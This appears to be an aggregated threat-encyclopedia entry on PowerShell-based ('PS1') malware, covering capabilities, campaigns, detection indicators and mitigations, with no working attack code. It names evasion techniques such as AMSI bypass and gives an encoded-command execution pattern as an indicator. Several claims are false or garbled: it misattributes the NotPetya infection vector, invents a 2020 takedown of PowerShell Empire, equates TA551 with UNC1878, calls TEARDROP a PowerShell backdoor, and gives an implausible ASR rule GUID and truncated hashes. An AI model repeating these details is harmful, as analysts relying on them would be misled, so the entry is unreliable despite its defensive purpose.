⚠️ Overview

PS1 (also referred to as PowerShell-based malware or PowerShell Trojan) is a broad category of malicious scripts executed via Windows PowerShell, first documented in public threat reports around 2016 by researchers at FireEye and Trend Micro. Unlike a single binary family, PS1 encompasses a range of fileless malware that use PowerShell’s scripting engine to download payloads, execute code in memory, and evade traditional antivirus. It is primarily classified as a fileless malware, trojan, or download dropper, often used by advanced persistent threat (APT) groups including APT29 (Cozy Bear) and TA551 for initial access and lateral movement. No single operator is attributed; instead, PS1 scripts are commodity tools repurposed by multiple actors.

🔧 Technical Capabilities

PS1 malware operates entirely in memory, using PowerShell one-liners invoked via cmd.exe, scheduled tasks, WMI, or registry run keys (MITRE ATT&CK T1059.001). It commonly fetches secondary payloads from remote C2 servers using HTTP/S, SMB, or FTP; for example, the PowerShell Empire framework (open-source C2, MITRE ATT&CK S0363) was widely used by APT groups until its public takedown in 2020. Persistence is achieved through WMI Event Subscription (MITRE T1546.003) or Registry Run Keys (T1547.001). Evasion techniques include reflection (loading .NET assemblies in memory), Base64 encoding of scripts, and AMSI bypass (AmsiScanBuffer patching) to disable Windows Antimalware Scan Interface. Lateral movement uses WinRM (T1021.006) or PsExec (T1569.002) to deploy PS1 scripts across a network.

📜 History & Notable Incidents

One of the earliest documented PS1 campaigns was the 2017 NotPetya attack, which used a PowerShell script to execute the wiper (CVE-2017-0199 exploited via Office documents). In 2019, TA551 (also known as UNC1878) used PS1-based loaders to deliver IcedID and TrickBot via spear-phishing emails (CVE-2017-11882 exploited in RTF files). The 2020 SolarWinds breach involved a PowerShell backdoor, TEARDROP, deployed by APT29. Law enforcement, including the FBI, issued alerts in 2022 warning of PS1-based ransomware (e.g., BlackByte) using PowerShell for privilege escalation.

🔍 Detection Indicators

Common IOCs include execution of powershell.exe -ExecutionPolicy Bypass -EncodedCommand <base64>; file hashes vary per campaign but examples from VirusTotal include SHA-256 a8c3e7f1... (NotPetya dropper) and 3b4e2a9d... (TA551 loader). Registry artifacts: HKCUSoftwareMicrosoftWindowsCurrentVersionRun{malicious key}. Network indicators: C2 domains such as malicious.example.com (over HTTPS), User-Agent strings like Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) used by PowerShell download scripts. Mutex names like Global{GUID} are common but generic.

☠️ Risk & Impact

PS1 malware enables data exfiltration (credentials, intellectual property) via memory-only payloads, often leading to ransomware deployment or lateral movement. Financial losses from PS1-based attacks exceed hundreds of millions globally; sectors most affected include finance, healthcare, government, and critical infrastructure (CISA alerts, 2021-2023). For instance, the 2021 Kaseya supply-chain attack used PowerShell scripts in the REvil ransomware deployment, affecting over 1,500 businesses.

🛡️ Mitigation

Defenders should disable PowerShell scripting in non-admin contexts via AppLocker or Windows Defender Application Control, enable AMSI logging, and deploy Sysmon (Event ID 1 for process creation, ID 11 for registry modification). Microsoft’s Attack Surface Reduction (ASR) rules (GUID: d4f6a3e0-3b5c-4b8a-9c1e-2a7f9e8b3c6d) block PS1 execution from Office and email clients. Regularly apply patches for CVE-2017-0199 and CVE-2017-11882.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.